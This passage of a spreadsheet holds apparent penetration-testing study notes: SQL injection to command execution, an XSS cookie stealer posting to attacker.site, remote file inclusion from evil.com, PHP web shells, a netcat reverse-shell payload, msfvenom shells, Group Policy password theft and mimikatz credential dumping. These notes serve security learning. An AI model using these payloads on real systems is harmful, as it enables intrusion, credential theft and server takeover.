        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">6. Upload Files:
a. Insert the file into a table in a MSSQL database under our control
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">CREATE TABLE HelperTable (File name in text format)
BULK INSERT HelperTables FROM 'file.exe' WITH (codepage='RAW')
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">b. Force the target DB server to retrieve it from our server. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">EXEC xp_cmdshell 'bcp "SELECT * FROM HelperTable" queryout file.exe -c Craw -S &lt;our_server address&gt; -U &lt;our server username&gt; -P &lt;our server password&gt;'
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">The victim will connect to our SQL server, read the exe file and recreate it remotely in the HelperTable. </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t>PTP 4.8.1.5</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">7. Storing command results in a Temporary Table:
a. Create a temporary table:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">CREATE TABLE temptable (id int not null identity (1,1), output nvarchar(4096) null);-- </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
id will help us to access different command outputs while the output column will contain the actual command results
b. Craft the argument for xp_cmdshell
We will need to convert the command string of the command we want to run into an ASCII representation i.e. say we want to run "dir c:\"
we have to convert every character to HEX ASCII representation... 64 is the HEX code for "d"
c. Create a variable with the command string (the HEX ASCII code we just formatted) and then pass it to xp_cmdshell.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">declare @t nvarchar(4096) set @t=&lt;HEX ASCII CODE&gt; 
insert into temptable (output) EXEC master.dbo.xp_cmdshell @t;
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">d. Read the results of a command
Use the id field of the temptable and dump the results as you would in any other sqli dump
e. Delete the temporary table:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>DROP TABLE temptable;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">https://blog.lucideus.com/2018/05/getting-meterpreter-shell-with-sqlmap.html
https://null-byte.wonderhowto.com/how-to/use-sql-injection-run-os-commands-get-shell-0191405/
</t>
  </si>
  <si>
    <t>SQLi to Server Takeover - MySQL Server</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Relies on a feature called the FILE privilege that gives permission to read and write files on the server host.
This privilege is always given to MySQL rootuser on nix and windows systems.
1. Connect to MySQL as root
2. Reading the file system:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">SELECT LOAD_FILE('&lt;text file path&gt;');
For a binary file -&gt; SELECT HEX(LOAD_FILE('&lt;text file path&gt;'));
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">3. Upload Files: /bin/ls HEX example. We have to create a file on our local machine and then load it into a table.
Converts the file into a HEX string:
mysql&gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">SELECT HEX (LOAD_FILE('/bin/ls')) INTO DUMPFILE '/tmp/ls.dmp';
-&gt; Should get query OK
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Load into the table:</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
mysql&gt; LOAD DATA INFILE '/tmp/ls.dmp' INTO TABLE mytable FIELDS TERMINATED BY 'someRandom' LINES TERMINATED BY 'Otherdn' (data);
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Use the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--os-cmd </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">and </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">--os-shell </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">flags to easily run os commands on MySQL. </t>
    </r>
  </si>
  <si>
    <t>Session Attacks</t>
  </si>
  <si>
    <t>A session ID is a unique key that identifies a users sessions within a database of sessions. 
An attacker can impersonate another users session if get hold of this. 
Important not to store session tokens in:
- URL
- HTML
- HTML Web Storage</t>
  </si>
  <si>
    <t>Session Hijacking</t>
  </si>
  <si>
    <t xml:space="preserve">Goal is to obtain the session id/ cookies. 
Can do this via:
- XSS
- Packet sniffing on HTTP
- Gaining direct access to server filesystem where sessions are stored
- Findign session IDs in logs or browser history </t>
  </si>
  <si>
    <t>Session Hijacking via XSS</t>
  </si>
  <si>
    <t xml:space="preserve">Can do this when the following conditions occur:
- An XSS vulnerability exists and you can execute your own payload through it
- Session ID is sent through cookies on each http request
- Cookies are readable by JavaScript (HTTPOnly is not enabled)
In stored xss, enter the below script into a comment field for example:
&lt;script&gt; var i=new Image();
i.src="http://attacker.site/steal.php?Q="%2bdocument.cookie;
&lt;/script&gt;
Once we grab a cookie, just put it into the header request in burp and good to go. </t>
  </si>
  <si>
    <t xml:space="preserve">Check preventing session hijacking using XSS on ptp notes for mitigation strategies/ tools. </t>
  </si>
  <si>
    <t>Session Hijacking via Packet Sniffing</t>
  </si>
  <si>
    <t>Requires the ability to sniff HTTP traffic. Only doable via a LAN (both victim and attacker in same network) and unencrypted http traffic (no ssl)</t>
  </si>
  <si>
    <t>Session Hijacking via Access to the Web Server</t>
  </si>
  <si>
    <t xml:space="preserve">If we have access to a webserver backend, we can just grab the session data from the server. 
- PHP: Try to find files names 'sess_&lt;session_ID&gt;' 
- Java: Tomcat server -&gt; Default session data is stored in SESSIONS.ser
- ASP.NET: We cannot read .NET session data directly from files on web servers. </t>
  </si>
  <si>
    <t>Session Fixation Attack</t>
  </si>
  <si>
    <t xml:space="preserve">Attacker fixates a sessionID and forces the victim to use it (after the victim logs in)
1. Attacker obtains valid sessionID.
2. Attacker forces the victim to use this sessionID to establish a person session with web server. </t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t xml:space="preserve">*Automated tools cannot find these attacks
Check slides, although this is liekly not in the exam
</t>
  </si>
  <si>
    <t>Directory Path Traversal</t>
  </si>
  <si>
    <t>Occurs when a webapp allows the user to retrieve a file from the webserver and the input is not sanitised.
We can move up/ down the file system on the webserver via doing this.
ie. the below shows how we can get the passwd file
http://&lt;website&gt;/getFile?path=../../etc/passwd
Just enter a bunch of ../'s, the webserver will still process it, doesnt matter how many we put in. 
Trigger an error to find out where we are in the webserver file system. i.e use a fake extension hello.aaaaa</t>
  </si>
  <si>
    <t>Path Conventions</t>
  </si>
  <si>
    <t>Windows:
&lt;Drive letter&gt;:\ i.e. path=C:\</t>
  </si>
  <si>
    <t>Linux:
Uses a slash i.e. path=/
Move up a directory -&gt; ../
Use %00 to terminate the file name. Useful if something is appended to the query by the webapp. 
i.e. ../../etc/passwd%00
Some webapps may filter these characters so use the below in place of them:
. = %2e (URL Encoding), %u002e (16 bit unicode)
/ = %2f, %u2215
\ = %5c, %u2216</t>
  </si>
  <si>
    <t>This is exactly the same as Directory Path Traversal?</t>
  </si>
  <si>
    <t>Remote File Inclusion</t>
  </si>
  <si>
    <t>RFI is similar to LFi, but instead the file to be included is pulled remotely. 
i.e. 
&lt;vuln website&gt;/hello.php?page=http://evil.com/shell.txt
We use a .txt because .php will run on the attacker machine (ours), rather than on the target web app. 
The above will allow the attacker to launch a shell and execute code on the server. 
Even simple PHP shells will accept commands from GET/ POST arguments and execute them on the server. 
To test this vulnerability:
try to inject http://www.google.com into the vulnerable parameter:
vuln.php?page=&lt;google&gt;
Example shell (shell.txt):
&lt;pre style="text-align:left;"&gt;
  &lt;?php
    echo shell_exec('pwd'); -&gt; command to run
    echo shell_exec('ls -lR ../'); -&gt; command to run
  ?&gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>Unrestricted File Upload</t>
  </si>
  <si>
    <t>Affects all web apps that allow file upload without enforcing policies such as:
- Max size of the file
- Nature of the file i.e pdf, XLS
We can upload a web shell and then simply navigate to the shell. The folder where the shell is placed must allow for server side scripts to be executed. 
We can type commands into the shell using the below example:
&lt;website&gt;/images(this is an example)/shell.php?cmd=&lt;command_u_want_to_use&gt;
To find where the upload is sent to, go to the source code of the page once the file is upload. 
i.e. image src = uploads/randomimage.jpeg. 
*Note: when uploaded, the file name may change, just find where the source code is trying to get the file from and note what it is called. 
Example php shell:
&lt;pre style='text-align:left;"&gt;
  &lt;?php
    echo shell_exec($_GET['cmd']);
   ?&gt;
&lt;/pre&gt;</t>
  </si>
  <si>
    <t>https://medium.com/hacker-toolbelt/dvwa-1-9-vi-file-upload-ce77a73b0453</t>
  </si>
  <si>
    <t>CSRF Process</t>
  </si>
  <si>
    <t>1. Find an application process i.e a checkout function, create admin function
2. Open burpsuite, and inspect what happens when the function is executed. 
3. Note the paramters passed 
4. Craft a link that will execute the function. Send this link to a victim via email. OR
5. Find a relfected or stored xss
6. i.e. a comment section and enter the below to automatically run the function
&lt;img src="function i.e. /startcreditTransfer.php?amount=11&amp;accountNumber=132423"&gt;</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Method 1:
1. See if ../../../../proc/self/environ is accessible
2. Use burp to capture the request to environ
3. Change the user agent string to:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>&lt;? Passthru("nc -e /bin/sh &lt;attacker_ip&gt; &lt;port&gt;"); ?&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
4. Setup netcat listener 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>nc -lvp &lt;port&gt;</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
5. Send the request 
6. Get shell</t>
    </r>
  </si>
  <si>
    <t>https://resources.infosecinstitute.com/local-file-inclusion-code-execution/#gref</t>
  </si>
  <si>
    <t>Unrestricted File Upload Shell</t>
  </si>
  <si>
    <t>1. msfvenom -p php/meterpreter/reverse_tcp LHOST=&lt;attacker_ip&gt; LPORT=4444 -o &lt;name&gt;.php
2. Upload
3. Setup multi handler listener with the php/meterpreter/reverse_tcp payload
4. Browse to the uploaded file. Click and run.  
OR we can upload a php reverse shell 
If php file extensions are blocked, try .phtml, php5, php4, php3</t>
  </si>
  <si>
    <t>https://sushant747.gitbooks.io/total-oscp-guide/content/bypass_image_upload.html
Use the below to bypass upload file extension restrictions
https://github.com/pentestmonkey/php-reverse-shell</t>
  </si>
  <si>
    <t>gobuster</t>
  </si>
  <si>
    <t>There are other ways to do this such as log poisoning, ssh key passthru exploit...</t>
  </si>
  <si>
    <t>Log poisoning:
/var/log/apache2/access.log</t>
  </si>
  <si>
    <t>Enumerate Computers</t>
  </si>
  <si>
    <t>meterpreter -&gt; run post/windows/gather/enum_computers</t>
  </si>
  <si>
    <t>Active Directory Enumeration and Escalation</t>
  </si>
  <si>
    <t>shell &gt; set</t>
  </si>
  <si>
    <t>Set' lists information about the environment variables in your victims environment. 
We are interested in:
USERDOMAIN= contains the name of the AD domain in NT format
USERDNSDOMAIN= gives info about the FQDN of the AD domain
USERNAME= 
LOGONSERVER= gives information about the domain controller used for authentication</t>
  </si>
  <si>
    <t>extapi</t>
  </si>
  <si>
    <t>extapi is a meterpreter module that allows us to enumerate AD.
Meterpreter &gt; load extapi
Meterpreter &gt; ? -&gt; this lists all available meterpreter commands</t>
  </si>
  <si>
    <t>https://www.darkoperator.com/blog/2014/1/29/enumeration-using-the-meterpreter-adsi-extended-api-commands</t>
  </si>
  <si>
    <t>Enumerate Domain Controller</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Once extapi is loaded, use the below command to find domain controller (and other computers in the AD environment)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">meterpreter &gt; adsi_computer_enum &lt;domain&gt;
or meterpreter &gt; run get_domain_name
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>We obtain the &lt;domain&gt; name from 'Set' -&gt; should be the USERDNSNAME value</t>
    </r>
  </si>
  <si>
    <t>Enumerate Users</t>
  </si>
  <si>
    <t xml:space="preserve">meterpreter &gt; adsi_user_enum examplead.lan
</t>
  </si>
  <si>
    <t xml:space="preserve">Finds which users are a part of the AD environment. </t>
  </si>
  <si>
    <t>Steal Credentials</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Process:
0. Run 'set' to find the relevant values for the below bolded figures
1. Locate AD policies:
AD policies are located in the below UNC path:
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">%USERDNSNAME%\Policies
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">However we cant access UNC paths via the command line, so we have to mount the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Sysvol share </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">to a drive on our machine and then enumerate the mount. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>a. Drop into a shell
b. shell &gt; net use X: \\&lt;DomainController or LogonServer&gt;\SysVol</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">c. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Navigate to the X: share
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">shell &gt;X:
d. cd %USERDNSNAME%\Policies i.e. examplea.lan\Policies
e. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Find user creation policies by searching for 'groups.xml' in the policies directory
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">shell &gt; dir /s *.xml
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">These files contain info about local users and groups deployed via group policies
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">f. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">We then want to cat each Groups.xml file and search for users that have been added to the Administrators account. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">shell &gt; type X:\&lt;entire file path&gt;\Groups.xml
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">We want to find the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>cpassword (encrypted password), the userName, and if their userName has been added to the groupName="Administrators"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">g. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Crack the encrypted password:
Use </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">gpp-decrypt &lt;password&gt; </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">in kali console to do so.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">h. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">We can then use these creds to exploit psexec, or simply upload a msf reverse tcp payload to the machine your already have access to -&gt; grant everyone privs to the payload </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>shell &gt; icacls &lt;exploit.exe&gt; /grant Everyone:(F) [F is the current share we are using]</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve"> use the </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">run_as </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">metasploit module to run the payload using the Local Administrators (the user and password we just cracked) to run the exploit. 
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">i. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Once we have a Local Admin shell, we can escalate to system using </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">get system </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">in meterpreter
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">j. </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">Load and run mimikatz
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">meterpreter &gt; kerberos </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">(Dump kerberos)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">meterpreter &gt; wdigest </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">(Dump wdigest creds)
Should get domain admin (we will have to know what the domain admin username is lol) from dumping creds. </t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">We want to obtain the domain admins credentials. </t>
  </si>
  <si>
    <t>Powershell Enumeration</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Upload </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">PowerView.ps1 
</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Run powerview:
shell &gt; powershell -ep bypass
shell &gt; \Downloads\PowerView.ps1</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">After running powershell -ep bypass
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">shell &gt; Get-NetUser | select cn
</t>
    </r>
  </si>
  <si>
    <t>Enumerate domain users</t>
  </si>
  <si>
    <t>shell &gt; Get-NetGroup -GroupName *admin or whatever*</t>
  </si>
  <si>
    <t>Enumerate domain groups</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">shell &gt; Invoke-ShareFinder 
or 
just using </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Get-SmbShare</t>
    </r>
  </si>
  <si>
    <t>List all shares</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">shell &gt; </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t>Get-NetComputer -fulldata | select operatingsystem</t>
    </r>
  </si>
  <si>
    <t>List all operating systems in the environment</t>
  </si>
  <si>
    <t>shell &gt; GetADDomain</t>
  </si>
  <si>
    <t>List the current domain name</t>
  </si>
  <si>
    <t>Assembler</t>
  </si>
  <si>
    <t xml:space="preserve">Translates the Assembly language to machine code. 
We will use NASM assembler. 
When a source code file is assembled, the resulting file is called an OBJECT FILE. </t>
  </si>
  <si>
    <t>Priv Esc via Services</t>
  </si>
  <si>
    <t xml:space="preserve">Process:
1. net start services
To escalate privileges, we should find and exploit services that:  
1. run with higher privileges 2. automatically start at boot • OR can be restarted (with lower privileges) • OR are vulnerable to DoS (meaning that we can cause the service to crash and let Windows to automatically restart it) 3. have their binaries in paths where we have write privileges.  
</t>
  </si>
  <si>
    <t>Compiler</t>
  </si>
  <si>
    <t xml:space="preserve">Compiler converts high level source code (Such as C) into low level code or directly into an object file. The end result is an Executable file. </t>
  </si>
  <si>
    <t>Assembly Instructions</t>
  </si>
  <si>
    <t xml:space="preserve">High level functions in code such as strcpy() are made of multiple ASM instructions put together to perform an operation. </t>
  </si>
  <si>
    <t>PUSH</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">PUSH stores a value to the top of the stack, causing the stack to be adjusted by </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-4 </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">bytes (on 32 bit systems)
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <color rgb="FF000000"/>
        <rFont val="Consolas"/>
        <family val="3"/>
      </rPr>
      <t xml:space="preserve">-0x04 
This makes the stack go higher. 
</t>
    </r>
  </si>
  <si>
    <t>Registers</t>
  </si>
  <si>
    <t xml:space="preserve">x86 = 32 bit processor
x64 = 64 bit processor (amd64)
32 or 64 refers to the width of the CPU registers. Registers are temporary variables used by the CPU to get and store data. </t>
  </si>
  <si>
    <t>8 General Purpose Registers (x86 naming conventions)</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">General Notes:
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">x86 = 32 bit processor/ x64 = 64 bit processor (amd64)
32 or 64 refers to the width of the CPU registers. Registers are temporary variables used by the CPU to get and store data. </t>
    </r>
  </si>
  <si>
    <t>General Purpose Registers:</t>
  </si>
  <si>
    <t>x86 Naming Convention (32 bit)</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Purpose</t>
  </si>
  <si>
    <t>EAX</t>
  </si>
  <si>
    <t>Accumulator</t>
  </si>
  <si>
    <t>Used in arithmetic operation</t>
  </si>
  <si>
    <t>ECX</t>
  </si>
  <si>
    <t>Counter</t>
  </si>
  <si>
    <t>Used in shift/ roate instruction and loops</t>
  </si>
  <si>
    <t>EDX</t>
  </si>
  <si>
    <t>Data</t>
  </si>
  <si>
    <t>Used in arithmetic operation and I/O</t>
  </si>
  <si>
    <t>EBX</t>
  </si>
  <si>
    <t>Base</t>
  </si>
  <si>
    <t>Used as a pointer to data</t>
  </si>
  <si>
    <t>ESP</t>
  </si>
  <si>
    <t>Stack Pointer</t>
  </si>
  <si>
